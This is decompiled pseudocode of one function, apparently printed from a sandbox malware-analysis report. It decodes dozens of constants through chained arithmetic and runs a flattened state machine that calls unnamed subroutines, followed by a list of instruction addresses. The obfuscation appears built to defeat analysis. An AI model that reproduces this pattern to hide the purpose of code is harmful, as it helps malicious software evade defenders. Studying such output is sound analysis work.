				void* _t1213;
				signed int _t1218;
				signed int _t1224;
				signed int _t1257;
				signed int _t1336;
				signed int _t1340;
				signed int _t1348;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1366;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				void* _t1384;
				signed int _t1385;
				void* _t1387;
				void* _t1389;
				void* _t1391;
				void* _t1392;
				void* _t1393;

				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
				_v596 = 0x54d1;
				_t1225 = 0x2a32d0a;
				_t1351 = 0x66;
				_v596 = _v596 / _t1351;
				_t1352 = 0x6b;
				_v596 = _v596 / _t1352;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002830;
				_v416 = 0xcdcb;
				_v416 = _v416 + 0x2116;
				_t1353 = 0x1f;
				_v416 = _v416 * 0x30;
				_v416 = _v416 ^ 0x002c9323;
				_v488 = 0x9982;
				_v488 = _v488 | 0x10c88477;
				_v488 = _v488 ^ 0xa41c88c2;
				_v488 = _v488 / _t1353;
				_v488 = _v488 ^ 0x05d51165;
				_v496 = 0x77c8;
				_v496 = _v496 >> 3;
				_t1354 = 0xa;
				_v496 = _v496 / _t1354;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x0000cb31;
				_v232 = 0x48c9;
				_v232 = _v232 << 0xe;
				_v232 = _v232 ^ 0x12321472;
				_v360 = 0x3c3d;
				_t1218 = 5;
				_v360 = _v360 / _t1218;
				_v360 = _v360 * 0x2f;
				_v360 = _v360 ^ 0x000268e3;
				_v176 = 0x1856;
				_v176 = _v176 * 0x70;
				_v176 = _v176 ^ 0x000ab2a8;
				_v264 = 0xa86e;
				_v264 = _v264 + 0xffff13b3;
				_v264 = _v264 ^ 0xffffefbf;
				_v376 = 0x5423;
				_v376 = _v376 + 0xffffd432;
				_v376 = _v376 | 0x32249576;
				_v376 = _v376 ^ 0x3224c778;
				_v248 = 0xe66f;
				_v248 = _v248 >> 9;
				_v248 = _v248 ^ 0x000023ba;
				_v308 = 0x205b;
				_v308 = _v308 + 0xffff1f5e;
				_v308 = _v308 << 8;
				_v308 = _v308 ^ 0xff3fb884;
				_v484 = 0x592;
				_v484 = _v484 + 0xffffd519;
				_v484 = _v484 | 0x759ff25f;
				_v484 = _v484 + 0x87eb;
				_v484 = _v484 ^ 0x00008574;
				_v168 = 0x6ddb;
				_v168 = _v168 | 0x6e943d07;
				_v168 = _v168 ^ 0x6e944d9a;
				_v200 = 0xd6b0;
				_v200 = _v200 + 0xffff46fa;
				_v200 = _v200 ^ 0x00002650;
				_v452 = 0x246b;
				_v452 = _v452 ^ 0x586b7630;
				_v452 = _v452 << 0xc;
				_v452 = _v452 + 0xd57e;
				_v452 = _v452 ^ 0xb526cd97;
				_v348 = 0xfa69;
				_t1340 = 0x52;
				_t1355 = 0x65;
				_v348 = _v348 * 0x65;
				_v348 = _v348 | 0xab757825;
				_v348 = _v348 ^ 0xab77a96f;
				_v324 = 0xa741;
				_v324 = _v324 ^ 0x4f747397;
				_v324 = _v324 / _t1340;
				_v324 = _v324 ^ 0x00f83cd8;
				_v296 = 0x788d;
				_v296 = _v296 ^ 0x0ef2968d;
				_v296 = _v296 ^ 0x495ddb9a;
				_v296 = _v296 ^ 0x47af2616;
				_v220 = 0xb89f;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 ^ 0x000056af;
				_v520 = 0x12ce;
				_v520 = _v520 + 0xe747;
				_v520 = _v520 << 7;
				_v520 = _v520 | 0x5b07959e;
				_v520 = _v520 ^ 0x5b7fa869;
				_v208 = 0xa95c;
				_v208 = _v208 + 0xffff5ee2;
				_v208 = _v208 ^ 0x00000a9e;
				_v172 = 0xa2eb;
				_v172 = _v172 * 0x79;
				_v172 = _v172 ^ 0x004d63d4;
				_v180 = 0x98a7;
				_v180 = _v180 | 0x8ae8094c;
				_v180 = _v180 ^ 0x8ae8e600;
				_v424 = 0xd5a0;
				_v424 = _v424 << 5;
				_v424 = _v424 / _t1355;
				_v424 = _v424 ^ 0x00007145;
				_v392 = 0x548d;
				_v392 = _v392 + 0xffff9ec2;
				_v392 = _v392 + 0xffffa1fb;
				_v392 = _v392 ^ 0xffff9dba;
				_v340 = 0x6e45;
				_t1356 = 0x16;
				_v340 = _v340 / _t1356;
				_v340 = _v340 + 0xffff4bce;
				_v340 = _v340 ^ 0xffff3c02;
				_v536 = 0xbde4;
				_v536 = _v536 * 0x7f;
				_v536 = _v536 ^ 0x574a5eba;
				_v536 = _v536 << 0xd;
				_v536 = _v536 ^ 0x8d54c30e;
				_v284 = 0x7ef6;
				_v284 = _v284 + 0x9ef0;
				_v284 = _v284 ^ 0x00015c31;
				_v408 = 0xc211;
				_v408 = _v408 ^ 0x3543d7c0;
				_v408 = _v408 * 0x2b;
				_v408 = _v408 ^ 0xf244fbb0;
				_v588 = 0x856b;
				_v588 = _v588 ^ 0xfc1cd259;
				_v588 = _v588 ^ 0x7d294751;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 ^ 0x000240de;
				_v508 = 0x646a;
				_t1357 = 0x1e;
				_v508 = _v508 / _t1357;
				_t1358 = 0x35;
				_v508 = _v508 / _t1358;
				_v508 = _v508 * 0x5a;
				_v508 = _v508 ^ 0x00003cc0;
				_v472 = 0x196b;
				_v472 = _v472 * 0x16;
				_v472 = _v472 + 0x8cdc;
				_v472 = _v472 ^ 0x6344539c;
				_v472 = _v472 ^ 0x6346dd33;
				_v212 = 0xb705;
				_v212 = _v212 << 7;
				_v212 = _v212 ^ 0x005bff43;
				_v312 = 0xb48f;
				_v312 = _v312 + 0xffff701f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00001302;
				_v480 = 0xed6e;
				_v480 = _v480 | 0x6be3eced;
				_v480 = _v480 + 0x4979;
				_v480 = _v480 ^ 0x6be47f6f;
				_v204 = 0xd35b;
				_v204 = _v204 >> 8;
				_v204 = _v204 ^ 0x00000622;
				_v456 = 0xd2fa;
				_v456 = _v456 << 3;
				_v456 = _v456 + 0xffffd4b1;
				_v456 = _v456 << 4;
				_v456 = _v456 ^ 0x0066f5d7;
				_v464 = 0x5ee1;
				_v464 = _v464 >> 9;
				_v464 = _v464 | 0xf1defbea;
				_v464 = _v464 ^ 0xf1de88d3;
				_v304 = 0x5962;
				_v304 = _v304 ^ 0xf5db8de9;
				_v304 = _v304 | 0xcdcbde78;
				_v304 = _v304 ^ 0xfddba732;
				_v196 = 0xf258;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x007971a7;
				_v448 = 0xfcbd;
				_v448 = _v448 | 0x39b7afc5;
				_v448 = _v448 * 0x70;
				_v448 = _v448 | 0x0e40c0bc;
				_v448 = _v448 ^ 0x4e7fac25;
				_v412 = 0x82bf;
				_v412 = _v412 | 0xb02f6e2d;
				_v412 = _v412 + 0xffff8626;
				_v412 = _v412 ^ 0xb02f1cac;
				_v396 = 0xa4bf;
				_v396 = _v396 ^ 0xb063c23f;
				_v396 = _v396 >> 0xf;
				_v396 = _v396 ^ 0x00011327;
				_v592 = 0x3de9;
				_v592 = _v592 + 0xffff189b;
				_v592 = _v592 * 0x3e;
				_v592 = _v592 + 0xffff8de2;
				_v592 = _v592 ^ 0xffd6d64a;
				_v404 = 0x86b0;
				_v404 = _v404 >> 5;
				_v404 = _v404 | 0x66bae114;
				_v404 = _v404 ^ 0x66bacebe;
				_v268 = 0x5937;
				_v268 = _v268 + 0xb57c;
				_v268 = _v268 ^ 0x00015145;
				_v280 = 0x9a1f;
				_v280 = _v280 + 0xffffa2eb;
				_v280 = _v280 ^ 0x000041dd;
				_v572 = 0xebd0;
				_v572 = _v572 ^ 0xedb0bf00;
				_t1359 = 0x32;
				_v572 = _v572 / _t1359;
				_v572 = _v572 << 1;
				_v572 = _v572 ^ 0x09819433;
				_v468 = 0x3364;
				_v468 = _v468 + 0xffff353c;
				_v468 = _v468 + 0x9f63;
				_v468 = _v468 | 0x0336228b;
				_v468 = _v468 ^ 0x0336362e;
				_v580 = 0x8c54;
				_v580 = _v580 | 0xf7fe7ffd;
				_v580 = _v580 << 2;
				_v580 = _v580 ^ 0xdffb9211;
				_v400 = 0xc44;
				_v400 = _v400 | 0x703220aa;
				_v400 = _v400 + 0x556b;
				_v400 = _v400 ^ 0x70328daf;
				_v316 = 0xc625;
				_t1360 = 0x2f;
				_v316 = _v316 / _t1360;
				_v316 = _v316 | 0xad0f9139;
				_v316 = _v316 ^ 0xad0f9a77;
				_v352 = 0x3bfc;
				_v352 = _v352 ^ 0x3d91e4fd;
				_v352 = _v352 << 4;
				_v352 = _v352 ^ 0xd91d9102;
				_v188 = 0xbf9d;
				_v188 = _v188 ^ 0xeb169de8;
				_v188 = _v188 ^ 0xeb160ae0;
				_v272 = 0xf610;
				_v272 = _v272 >> 0xc;
				_v272 = _v272 ^ 0x000001f5;
				_v500 = 0xa952;
				_v500 = _v500 ^ 0x762f8db9;
				_t1361 = 0x7b;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 | 0x4a766c6e;
				_v500 = _v500 ^ 0xca77b322;
				_v420 = 0xb3ce;
				_v420 = _v420 | 0x5d2bbb9b;
				_v420 = _v420 + 0x97cf;
				_v420 = _v420 ^ 0x5d2c523b;
				_v276 = 0x9f6f;
				_v276 = _v276 + 0x6bc4;
				_v276 = _v276 ^ 0x00010aa4;
				_v504 = 0x2102;
				_v504 = _v504 >> 7;
				_v504 = _v504 + 0xffff0b4b;
				_v504 = _v504 << 4;
				_v504 = _v504 ^ 0xfff0cd66;
				_v320 = 0xeb7e;
				_v320 = _v320 / _t1361;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x001ed973;
				_v512 = 0x61aa;
				_v512 = _v512 | 0xfdc9feff;
				_t1362 = 0x42;
				_v512 = _v512 / _t1362;
				_v512 = _v512 ^ 0x03d81aae;
				_v540 = 0x929f;
				_t1363 = 3;
				_v540 = _v540 * 0x59;
				_v540 = _v540 ^ 0xd582cfd5;
				_v540 = _v540 + 0xffff6c6f;
				_v540 = _v540 ^ 0xd5af900c;
				_v332 = 0xd4e0;
				_v332 = _v332 | 0xf04e42e2;
				_v332 = _v332 ^ 0xcda3b68f;
				_v332 = _v332 ^ 0x3ded4bfa;
				_v192 = 0xb136;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x00000257;
				_v460 = 0xb4b8;
				_v460 = _v460 + 0xffff8599;
				_v460 = _v460 / _t1363;
				_v460 = _v460 + 0x6faa;
				_v460 = _v460 ^ 0x0000d8b1;
				_v548 = 0x6ab8;
				_t1364 = 0x7c;
				_v548 = _v548 * 0x71;
				_v548 = _v548 / _t1364;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00063121;
				_v260 = 0x579;
				_v260 = _v260 >> 0xd;
				_v260 = _v260 ^ 0x00001a36;
				_v380 = 0x5d49;
				_t1365 = 0x3a;
				_v380 = _v380 * 0x2a;
				_v380 = _v380 << 0xf;
				_v380 = _v380 ^ 0xa6fd05f8;
				_v584 = 0x9575;
				_v584 = _v584 << 0xe;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 >> 9;
				_v584 = _v584 ^ 0x00001953;
				_v388 = 0x71ed;
				_v388 = _v388 | 0xfa0f4c1a;
				_v388 = _v388 * 0x21;
				_v388 = _v388 ^ 0x3bff2db3;
				_v576 = 0x40ac;
				_v576 = _v576 ^ 0x72872e3c;
				_v576 = _v576 >> 3;
				_v576 = _v576 >> 6;
				_v576 = _v576 ^ 0x00395cc8;
				_v356 = 0x9a14;
				_v356 = _v356 * 5;
				_v356 = _v356 / _t1365;
				_v356 = _v356 ^ 0x00000d15;
				_v364 = 0x97d4;
				_v364 = _v364 + 0xffff1281;
				_v364 = _v364 << 0xd;
				_v364 = _v364 ^ 0xf54ac276;
				_v568 = 0x9f15;
				_v568 = _v568 + 0xffff08f5;
				_v568 = _v568 * 0x54;
				_v568 = _v568 + 0x8411;
				_v568 = _v568 ^ 0xffe3bf59;
				_v372 = 0xb5ac;
				_v372 = _v372 | 0xef292143;
				_v372 = _v372 << 0xc;
				_v372 = _v372 ^ 0x9b5ed191;
				_v560 = 0xc079;
				_v560 = _v560 << 6;
				_v560 = _v560 | 0x75378a54;
				_v560 = _v560 + 0xffff0fb6;
				_v560 = _v560 ^ 0x7536a745;
				_v252 = 0xffdd;
				_v252 = _v252 ^ 0x94fd4b64;
				_v252 = _v252 ^ 0x94fd9346;
				_v344 = 0x2817;
				_v344 = _v344 + 0xffffb9ce;
				_v344 = _v344 >> 5;
				_v344 = _v344 ^ 0x07ffc707;
				_v544 = 0xc4c3;
				_v544 = _v544 << 4;
				_v544 = _v544 | 0xf37ee84d;
				_v544 = _v544 >> 9;
				_v544 = _v544 ^ 0x0079cb8a;
				_v244 = 0xbe83;
				_v244 = _v244 << 9;
				_v244 = _v244 ^ 0x017d70fa;
				_v552 = 0x87b1;
				_v552 = _v552 + 0xe2ec;
				_v552 = _v552 + 0xffff8757;
				_t1366 = 0x57;
				_v552 = _v552 / _t1366;
				_v552 = _v552 ^ 0x00000cf8;
				_v524 = 0x9ee8;
				_v524 = _v524 >> 0xc;
				_v524 = _v524 + 0xffffea20;
				_v524 = _v524 + 0x67c2;
				_v524 = _v524 ^ 0x0000257d;
				_v240 = 0x3e44;
				_t1367 = 0x4e;
				_v240 = _v240 * 0x26;
				_v240 = _v240 ^ 0x000944b9;
				_v184 = 0xb17e;
				_v184 = _v184 + 0xc83;
				_v184 = _v184 ^ 0x00008468;
				_v428 = 0x2247;
				_v428 = _v428 >> 6;
				_v428 = _v428 | 0xbf36a58a;
				_v428 = _v428 ^ 0xbf36942e;
				_v492 = 0xaf88;
				_v492 = _v492 | 0x489e17bf;
				_v492 = _v492 / _t1367;
				_t1368 = 0x59;
				_v492 = _v492 / _t1368;
				_v492 = _v492 ^ 0x00028cc4;
				_v236 = 0x579b;
				_v236 = _v236 | 0x958cbadb;
				_v236 = _v236 ^ 0x958cb114;
				_v528 = 0x596e;
				_t1369 = 0x25;
				_v528 = _v528 / _t1369;
				_v528 = _v528 + 0xffff0f20;
				_v528 = _v528 * 0x71;
				_v528 = _v528 ^ 0xff96cb88;
				_v384 = 0xdb4f;
				_v384 = _v384 / _t1340;
				_v384 = _v384 ^ 0x047c7efe;
				_v384 = _v384 ^ 0x047c6269;
				_v256 = 0x2cf1;
				_v256 = _v256 | 0x808b3cca;
				_v256 = _v256 ^ 0x808b1c76;
				_v300 = 0x3901;
				_t1370 = 0x6d;
				_v300 = _v300 * 0xa;
				_v300 = _v300 >> 6;
				_v300 = _v300 ^ 0x0000212b;
				_v368 = 0x796e;
				_v368 = _v368 * 0xc;
				_v368 = _v368 * 0x3e;
				_v368 = _v368 ^ 0x0160b691;
				_v444 = 0xa0b9;
				_v444 = _v444 | 0x9ca1dfa8;
				_v444 = _v444 / _t1370;
				_v444 = _v444 * 0x63;
				_v444 = _v444 ^ 0x8e437e2f;
				_v532 = 0x8c65;
				_v532 = _v532 * 0x56;
				_v532 = _v532 << 0xa;
				_v532 = _v532 * 0x21;
				_v532 = _v532 ^ 0x519e8d1f;
				_v556 = 0x4a7f;
				_v556 = _v556 << 0xf;
				_v556 = _v556 + 0xa5c2;
				_v556 = _v556 | 0xa1707f4f;
				_v556 = _v556 ^ 0xa5705fb9;
				_v436 = 0x3fda;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 + 0x1364;
				_v436 = _v436 ^ 0xe1573554;
				_v436 = _v436 ^ 0xe158f097;
				_v564 = 0x6043;
				_v564 = _v564 | 0xb689377f;
				_v564 = _v564 >> 8;
				_v564 = _v564 ^ 0x2a62422c;
				_v564 = _v564 ^ 0x2ad4e10a;
				_v328 = 0x5c6e;
				_v328 = _v328 ^ 0x42ae754b;
				_v328 = _v328 + 0xbaa3;
				_v328 = _v328 ^ 0x42aeef53;
				_v228 = 0xef63;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x00001997;
				_v336 = 0x5044;
				_v336 = _v336 >> 0xf;
				_v336 = _v336 + 0xffffb35b;
				_v336 = _v336 ^ 0xffffef5d;
				_v440 = 0x7004;
				_v440 = _v440 * 0x7e;
				_v440 = _v440 * 0x13;
				_v440 = _v440 << 0x10;
				_v440 = _v440 ^ 0x85685bd2;
				_v164 = 0x75ea;
				_v164 = _v164 << 0xb;
				_v164 = _v164 ^ 0x03af40f2;
				_v224 = 0xc6cf;
				_v224 = _v224 << 9;
				_v224 = _v224 ^ 0x018dae64;
				_v160 = 0xb450;
				_t1371 = 0x38;
				_v160 = _v160 / _t1371;
				_v160 = _v160 ^ 0x00003b29;
				_v476 = 0xddbc;
				_v476 = _v476 ^ 0xc2407c95;
				_v476 = _v476 + 0xd5a3;
				_v476 = _v476 + 0x8192;
				_v476 = _v476 ^ 0xc241f0f2;
				_v216 = 0xdff2;
				_t1372 = 0x2c;
				_v216 = _v216 * 0x1c;
				_v216 = _v216 ^ 0x00187743;
				_v516 = 0x400b;
				_v516 = _v516 / _t1218;
				_v516 = _v516 + 0xc836;
				_v516 = _v516 >> 0xa;
				_v516 = _v516 ^ 0x00004f08;
				_v292 = 0xdc4e;
				_v292 = _v292 * 0x16;
				_v292 = _v292 * 0x7f;
				_v292 = _v292 ^ 0x09643e15;
				_v600 = 0x4d46;
				_v600 = _v600 + 0xffff0db8;
				_v600 = _v600 + 0x84f3;
				_v600 = _v600 + 0xc039;
				_v600 = _v600 ^ 0x0000d5ed;
				_v432 = 0x8bd1;
				_v432 = _v432 << 0xc;
				_v432 = _v432 + 0x8a22;
				_v432 = _v432 / _t1372;
				_v432 = _v432 ^ 0x003284c4;
				_v288 = 0x245c;
				_v288 = _v288 | 0x526859ae;
				_v288 = _v288 * 0xc;
				_v288 = _v288 ^ 0xdce5b0ef;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t1391 = _t1225 - 0x1bd1caec;
							if(_t1391 <= 0) {
							}
							L3:
							if(_t1391 == 0) {
								__eflags = E006D02C3();
								if(__eflags == 0) {
									_t1135 = E006C7903();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1135 & 0x0209e55e) + 0x3544b2a;
									while(1) {
										L2:
										_t1391 = _t1225 - 0x1bd1caec;
										if(_t1391 <= 0) {
										}
										goto L3;
									}
								}
								_t1144 = E006C7903();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1144 & 0x03449ef9;
								L32:
								_t1225 = _t1257 + 0xda99535;
								while(1) {
									L2:
									_t1391 = _t1225 - 0x1bd1caec;
									if(_t1391 <= 0) {
									}
									goto L54;
								}
								goto L3;
							}
							_t1392 = _t1225 - 0x10ee342e;
							if(_t1392 > 0) {
								__eflags = _t1225 - 0x15603e6b;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x159448ba;
									if(_t1225 == 0x159448ba) {
										E006CC562(_v540,  &_v80, _v332, _v192);
										_t1225 = 0x17799f6a;
										continue;
									}
									__eflags = _t1225 - 0x1653011b;
									if(_t1225 == 0x1653011b) {
										E006CF536(_v384, _v256, _v300, _v140);
										_t1225 = 0x21caf663;
										continue;
									}
									__eflags = _t1225 - 0x17799f6a;
									if(_t1225 == 0x17799f6a) {
										_t1138 = E006C9A37( &_v112,  &_v132, _v460, _v548);
										asm("sbb ecx, ecx");
										_t1225 = ( ~_t1138 & 0x1d975e2e) + 0x7ff6f9b;
										continue;
									}
									__eflags = _t1225 - 0x1b19f75b;
									if(_t1225 != 0x1b19f75b) {
										break;
									}
									_t1144 = E006D73AC();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1144 & 0x1b44a5c9) + 0x1bd1caec;
									continue;
								}
								if(__eflags == 0) {
									_t1144 = E006CF444(_t1225);
									L112:
									return _t1144;
								}
								__eflags = _t1225 - 0x10f69b27;
								if(_t1225 == 0x10f69b27) {
									_t1144 = E006DAB96();
									_t1225 = 0x326a8235;
									continue;
								}
								__eflags = _t1225 - 0x11454f34;
								if(_t1225 == 0x11454f34) {
									_t1144 = E006CD7EB();
									_t1225 = 0x356cf65c;
									continue;
								}
								__eflags = _t1225 - 0x11dfa862;
								if(__eflags == 0) {
									_t1225 = 0x376e2cde;
									continue;
								}
								__eflags = _t1225 - 0x13c96655;
								if(_t1225 != 0x13c96655) {
									break;
								}
								_t1144 = E006C62A3();
								goto L112;
							}
							if(_t1392 == 0) {
								_t1140 = E006C153C();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1140 & 0x061fd120;
								__eflags = _t1257;
								goto L32;
							}
							_t1393 = _t1225 - 0x55e3088;
							if(_t1393 > 0) {
								__eflags = _t1225 - 0x7ff6f9b;
								if(_t1225 == 0x7ff6f9b) {
									_t1336 = _v436;
									E006CF536(_v556, _t1336, _v564, _v80);
									_t1225 = 0x3140af28;
									continue;
								}
								__eflags = _t1225 - 0xb356ed5;
								if(_t1225 == 0xb356ed5) {
									_t1144 = E006CC2E2();
									_v104 = _t1144;
									_t1225 = 0x288da576;
									continue;
								}
								__eflags = _t1225 - 0xd8c7d27;
								if(_t1225 == 0xd8c7d27) {
									_push( &_v68);
									_t1336 = _v572;
									_t1144 = E006D2349(_v280, _t1336, _v468, _v580, _t1225);
									_t1387 = _t1387 + 0x10;
									__eflags = _t1144;
									if(__eflags == 0) {
										L28:
										_t1225 = 0x15603e6b;
										continue;
									}
									_t1336 = _v316;
									_v112 =  &_v68;
									_t1144 = E006CDFE2(_v400, _t1336,  &_v68);
									_v108 = _t1144;
									_t1225 = 0x2267098;
									continue;
								}
								__eflags = _t1225 - 0xda99535;
								if(_t1225 != 0xda99535) {
									break;
								}
								E006D7D03();
								_t1144 = E006C8317();
								L25:
								_t1225 = 0x23233137;
								continue;
							}
							if(_t1393 == 0) {
								_t1144 = E006D63C1();
								_t1225 = 0x3544b2a;
								continue;
							}
							if(_t1225 == 0x13a2b08) {
								_t1225 = 0x282d346f;
								continue;
							}
							if(_t1225 == 0x2267098) {
								_t1144 = E006D611C();
								_v72 = _t1144;
								_t1225 = 0xb356ed5;
								continue;
							}
							if(_t1225 == 0x2a32d0a) {
								_t1225 = 0x34a6f88;
								continue;
							}
							if(_t1225 == 0x34a6f88) {
								_t1144 = E006D3632(__eflags);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L112;
								} else {
									_t1225 = 0x3833d453;
									continue;
								}
							}
							if(_t1225 != 0x3544b2a) {
								break;
							} else {
								_t1144 = E006D1BDF();
								_t1225 = 0x371670b5;
								continue;
							}
							L54:
							__eflags = _t1225 - 0x2e6b2744;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x35bdcd5f;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x371670b5;
									if(_t1225 == 0x371670b5) {
										E006D8F49();
										_t1225 = 0x30491502;
										break;
									}
									__eflags = _t1225 - 0x376e2cde;
									if(__eflags == 0) {
										_v148 = E006CF85D(_v472, __eflags,  &_v144, _v212, _v312, _v480);
										E006C48BD( &_v148, _v204, _v456, _v464);
										_t1387 = _t1387 + 0x18;
										_t1336 = _v148;
										E006D2025(_v304, _t1336, _v196, _v448);
										_t1225 = 0x13a2b08;
										continue;
									}
									__eflags = _t1225 - 0x37f9587b;
									if(__eflags == 0) {
										_v96 = 0x1346150;
										_t1225 = 0x2e6b2744;
										continue;
									}
									__eflags = _t1225 - 0x3833d453;
									if(_t1225 != 0x3833d453) {
										break;
									}
									_t1144 = E006D6014(); // executed
									_t1225 = 0x1e57e2ba;
									continue;
								}
								if(__eflags == 0) {
									_t1336 = _v320;
									_t1144 = E006DA0AF(_v504, _t1336, _v512,  &_v88);
									_t1225 = 0x159448ba;
									continue;
								}
								__eflags = _t1225 - 0x30491502;
								if(_t1225 == 0x30491502) {
									_t1144 = E006CEE78();
									__eflags = _t1144;
									if(__eflags == 0) {
										goto L112;
									}
									_t1225 = 0x2a91822d;
									continue;
								}
								__eflags = _t1225 - 0x3140af28;
								if(_t1225 == 0x3140af28) {
									_t1336 = _v228;
									_t1144 = E006CF536(_v328, _t1336, _v336, _v88);
									goto L25;
								}
								__eflags = _t1225 - 0x326a8235;
								if(__eflags == 0) {
									_t1336 =  &_v124;
									_t1144 = E006D71EF(_t1336, __eflags, _v528);
									__eflags = _t1144;
									if(__eflags != 0) {
										asm("xorps xmm0, xmm0");
										asm("movlpd [esp+0x1d0], xmm0");
									}
									L95:
									_t1225 = 0x1653011b;
									continue;
								}
								__eflags = _t1225 - 0x356cf65c;
								if(_t1225 != 0x356cf65c) {
									break;
								}
								_t1144 = E006D67F0();
								_t1225 = 0x13c96655;
								continue;
							}
							if(__eflags == 0) {
								_v92 = 0x1388;
								_t1225 = 0x35bdcd5f;
								continue;
							}
							__eflags = _t1225 - 0x23233137;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x2596cdc9;
								if(_t1225 == 0x2596cdc9) {
									_push(_v388);
									_push(_v584);
									_push(_v380);
									_t1336 = _v260;
									_push( &_v132);
									_push( &_v140);
									_t1172 = E006C9FDC(_t1336);
									_t1389 = _t1387 + 0x14;
									__eflags = _t1172;
									if(_t1172 == 0) {
										E006C790F();
										E006C78A5(_t1225, _t1225, 0x1f40, _t1225, 0xfa0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E006C8317();
										_t1225 = 0x21caf663;
										asm("adc ebx, 0x0");
									} else {
										_t1384 = 0x35bdcd5f;
										_t1213 = E006C78A5(_t1225, _t1225, 0xef420, _t1225, 0xdbba0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E006C8317();
										_t1224 = _t1336;
										_t1348 = _t1144 + _t1213;
										_t1225 = 0x21c9d3c7;
										asm("adc ebx, 0x0");
									}
									while(1) {
										L1:
										goto L2;
									}
								}
								__eflags = _t1225 - 0x282d346f;
								if(_t1225 == 0x282d346f) {
									_t1384 = 0xd8c7d27;
									_t1186 = E006C78A5(_t1225, _t1225, 0x2ee0, _t1225, 0xfa0);
									_t1387 = _t1387 + 0x10;
									_t1144 = E006C8317();
									_t1224 = _t1336;
									_t1348 = _t1144 + _t1186;
									_t1225 = 0x23233137;
									asm("adc ebx, 0x0");
									goto L1;
								}
								__eflags = _t1225 - 0x288da576;
								if(_t1225 == 0x288da576) {
									_t1144 = E006CF326();
									_v100 = _t1144;
									_t1225 = 0x37f9587b;
									continue;
								}
								__eflags = _t1225 - 0x2a91822d;
								if(_t1225 != 0x2a91822d) {
									break;
								}
								E006D3895();
								_t1144 = E006C7903();
								asm("sbb ecx, ecx");
								_t1225 = ( ~_t1144 & 0xdbd858d8) + 0x356cf65c;
								continue;
							}
							if(__eflags == 0) {
								_t1144 = _t1348 | _t1224;
								__eflags = _t1144;
								if(_t1144 != 0) {
									_t1199 = E006C78A5(_t1225, _t1225, 0x4b0, _t1225, 0x190);
									_t1387 = _t1387 + 8;
									_t1336 = _t1199;
									_t1144 = E006D3F62(_t1336, __eflags);
									__eflags = _t1144;
									if(__eflags != 0) {
										goto L28;
									}
									_t1144 = E006C8317();
									__eflags = _t1336 - _t1224;
									if(__eflags < 0) {
										L74:
										_t1225 = 0x23233137;
										break;
									}
									if(__eflags > 0) {
										goto L69;
									}
									__eflags = _t1144 - _t1348;
									if(_t1144 >= _t1348) {
										goto L69;
									}
									goto L74;
								}
								L69:
								_t1225 = _t1384;
								break;
							}
							__eflags = _t1225 - 0x1d55cf6f;
							if(_t1225 == 0x1d55cf6f) {
								_t1144 = E006D12E2();
								goto L112;
							}
							__eflags = _t1225 - 0x1e57e2ba;
							if(_t1225 == 0x1e57e2ba) {
								_t1144 = E006D4B41();
								__eflags = _t1144;
								if(_t1144 == 0) {
									goto L112;
								}
								_t1144 = E006D84C4(_v360);
								_t1225 = 0x1b19f75b;
								continue;
							}
							__eflags = _t1225 - 0x21c9d3c7;
							if(_t1225 == 0x21c9d3c7) {
								_t1336 = _v524;
								_t1144 = E006D3FE7( &_v124, _t1336, _v240,  &_v140);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L95;
								}
								_t1144 = E006D67E9();
								__eflags = _v116;
								_t1225 = 0x10f69b27;
								if(__eflags != 0) {
									__eflags = _v116 - 7;
									_t1225 =  ==  ? 0x1d55cf6f : 0x10f69b27;
								}
								continue;
							}
							__eflags = _t1225 - 0x21caf663;
							if(_t1225 != 0x21caf663) {
								break;
							}
							_t1336 = _v444;
							_t1144 = E006CF536(_v368, _t1336, _v532, _v132);
							_t1225 = 0x7ff6f9b;
						}
						__eflags = _t1225 - 0x3adf5394;
					} while (__eflags != 0);
					goto L112;
				}
			}















































































































































































                                          0x006c2c69
                                          0x006c2c6f
                                          0x006c2c7d
                                          0x006c2c88
                                          0x006c2c8d
                                          0x006c2c97
                                          0x006c2c9c
                                          0x006c2ca2
                                          0x006c2ca7
                                          0x006c2caf
                                          0x006c2cba
                                          0x006c2ccd
                                          0x006c2cd0
                                          0x006c2cd7
                                          0x006c2ce2
                                          0x006c2ced
                                          0x006c2cf8
                                          0x006c2d0e
                                          0x006c2d15
                                          0x006c2d20
                                          0x006c2d2b
                                          0x006c2d3a
                                          0x006c2d3f
                                          0x006c2d48
                                          0x006c2d50
                                          0x006c2d5b
                                          0x006c2d66
                                          0x006c2d6e
                                          0x006c2d79
                                          0x006c2d8b
                                          0x006c2d8e
                                          0x006c2d9d
                                          0x006c2da4
                                          0x006c2daf
                                          0x006c2dc2
                                          0x006c2dc9
                                          0x006c2dd4
                                          0x006c2ddf
                                          0x006c2dea
                                          0x006c2df5
                                          0x006c2e00
                                          0x006c2e0b
                                          0x006c2e16
                                          0x006c2e21
